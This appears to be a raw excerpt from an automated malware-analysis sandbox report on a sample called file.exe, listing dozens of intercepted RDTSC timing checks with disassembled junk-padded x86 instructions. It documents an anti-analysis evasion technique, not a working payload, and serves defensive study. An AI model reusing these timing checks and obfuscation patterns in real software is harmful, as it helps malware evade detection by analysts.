Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FCF58 second address: 8FCF84 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F848150386Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jne 00007F8481503877h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906153 second address: 90615D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90615D second address: 906167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906167 second address: 90616B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90616B second address: 906180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F848150386Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906180 second address: 906184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89D401 second address: 89D409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90587C second address: 905880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905880 second address: 905886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905886 second address: 905896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F8480743926h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905896 second address: 90589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905BBB second address: 905BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905BBF second address: 905BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 jmp 00007F848150386Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F848150386Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905BF0 second address: 905BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905BF6 second address: 905C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8481503879h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905C18 second address: 905C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905C22 second address: 905C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 905D40 second address: 905D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B449 second address: 90B45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8481503866h 0x0000000a pop esi 0x0000000b jl 00007F848150386Ah 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B45E second address: 90B484 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F848074392Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F8480743928h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007F848074392Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90D702 second address: 90D714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8481503866h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90D714 second address: 90D71A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90D71A second address: 90D720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914012 second address: 914025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912C71 second address: 912C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912C7A second address: 912C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912C80 second address: 912C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913324 second address: 91332A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91332A second address: 913345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F8481503873h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913345 second address: 913369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F8480743943h 0x0000000b jmp 00007F8480743937h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913369 second address: 913373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913373 second address: 913379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913379 second address: 91337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91337E second address: 913389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8480743926h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9134D0 second address: 9134E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F8481503866h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9134E1 second address: 9134F2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91368A second address: 91368E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91368E second address: 913692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9137E4 second address: 913805 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F8481503866h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 je 00007F8481503866h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913ABB second address: 913AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8480743930h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913AD2 second address: 913ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913C30 second address: 913C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89EE71 second address: 89EE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89EE76 second address: 89EE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91D8E2 second address: 91D8F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91C5FB second address: 91C601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91C8CD second address: 91C8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503872h 0x00000011 jl 00007F8481503866h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CA31 second address: 91CA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743935h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CA4C second address: 91CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CCC9 second address: 91CCCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CCCD second address: 91CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91D11D second address: 91D130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F8480743926h 0x0000000d jno 00007F8480743926h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C9783 second address: 8C9787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91D773 second address: 91D777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91D777 second address: 91D792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F848150386Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91D792 second address: 91D7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924375 second address: 92437F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92437F second address: 924389 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924389 second address: 924394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 894CAB second address: 894CC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F848074392Ch 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92332B second address: 923341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92360B second address: 923626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480743937h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923761 second address: 923765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923A35 second address: 923A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923A3B second address: 923A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503875h 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923A5A second address: 923A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8480743938h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8480743931h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923A8E second address: 923AA3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8481503868h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jbe 00007F8481503866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923AA3 second address: 923AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923C10 second address: 923C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923C14 second address: 923C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743937h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923DBB second address: 923DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F848150386Fh 0x00000008 jl 00007F8481503866h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923DD7 second address: 923DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923DDF second address: 923DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923DE5 second address: 923DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9278BE second address: 9278C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9278C2 second address: 9278C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9278C6 second address: 9278D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9278D0 second address: 9278D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9278D4 second address: 9278F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jo 00007F848150387Ah 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F8481503866h 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92AF3E second address: 92AF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92AF47 second address: 92AF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92AF4D second address: 92AF62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jno 00007F8480743926h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92AF62 second address: 92AF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92AF66 second address: 92AF6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92AF6C second address: 92AF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E276B second address: 8E279E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8480743934h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2C1E second address: 8E2C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2C24 second address: 8E2C9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 jmp 00007F8480743935h 0x0000001a pop ebx 0x0000001b pop eax 0x0000001c mov cx, si 0x0000001f pushad 0x00000020 jmp 00007F848074392Eh 0x00000025 mov si, cx 0x00000028 popad 0x00000029 call 00007F8480743929h 0x0000002e jmp 00007F8480743938h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F8480743934h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2C9E second address: 8E2CA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2CA3 second address: 8E2CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnp 00007F8480743933h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F8480743935h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2D75 second address: 8E2D8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E30A8 second address: 8E30B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jnp 00007F8480743934h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E30B9 second address: 8E3102 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F848150386Ah 0x00000010 push 00000004h 0x00000012 jmp 00007F8481503876h 0x00000017 push eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8481503878h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3102 second address: 8E3106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3575 second address: 8E357A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E389B second address: 8E389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3A06 second address: 8E3A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3A0A second address: 8E3A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3A1B second address: 8C9783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8481503876h 0x0000000c jc 00007F8481503866h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 sub cx, 1441h 0x0000001a call dword ptr [ebp+122D20AFh] 0x00000020 pushad 0x00000021 jns 00007F8481503868h 0x00000027 push edi 0x00000028 jbe 00007F8481503866h 0x0000002e pop edi 0x0000002f popad 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F848150386Dh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
